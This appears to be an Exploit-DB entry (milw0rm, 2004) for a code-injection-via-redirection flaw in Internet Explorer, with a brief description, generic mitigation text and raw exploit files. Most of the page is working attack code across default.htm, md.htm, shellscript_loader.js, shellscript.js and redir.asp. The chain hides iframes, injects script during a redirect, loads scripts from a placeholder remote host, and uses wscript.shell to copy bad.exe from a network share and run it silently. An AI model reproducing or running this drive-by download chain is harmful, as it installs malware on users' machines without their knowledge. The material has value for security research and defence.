Code Injection via Redirection

vendor:

by:

CVSS

HIGH

Code Injection

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows

Code Injection via Redirection

This exploit demonstrates a code injection vulnerability that occurs during redirection. The attacker injects malicious code into the page using various scripts and then redirects the user to a different URL. The injected code loads a shell script from a remote server and executes it on the user's system.

Mitigation:

To mitigate this vulnerability, ensure that all user input is properly validated and sanitized before being used in any scripts or dynamic content. Additionally, implement proper access controls and permissions to prevent unauthorized access to sensitive resources.

Source

Exploit-DB raw data:

-----------------------------------------------------  default.htm  -------------------------------------------------------
<html>
<body>
<img src="cc.exe" width=0 height=0 style=display:none>

<script language="Javascript">

function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-1000\;dialogLeft:-1000\;dialogHeight:1\;dialogWidth:1\;").
location="vbscript:\"<SCRIPT SRC='http://IPADDRESS/shellscript_loader.js'><\/script>\"";
}

</script>

<script language="javascript">

setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.asp" style=display:none;></IFRAME>');

</script>

</body>
</html>

--------------------------------------------------------- md.htm  ---------------------------------------------------------
<SCRIPT language="javascript">

window.returnValue = window.dialogArguments;

function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}

CheckStatus();

</SCRIPT>

--------------------------------------------------- shellscript_loader.js  ---------------------------------------------------
function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://IPADDRESS/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

------------------------------------------------------- shellscript.js  -------------------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER>
var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe";var wF="%windir%\\\\_tmp.exe";var 
o=new ActiveXObject("wscript.shell");var e="%comspec% /c copy "+rF+" "+wF;var err=o.Run(e,0,true);if(err==0)
o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
--------------------------------------------------------- redir.asp  ----------------------------------------------------------
<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
z = z + 10
Next

Response.Status = "302 Found" 
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>


# milw0rm.com [2004-07-13]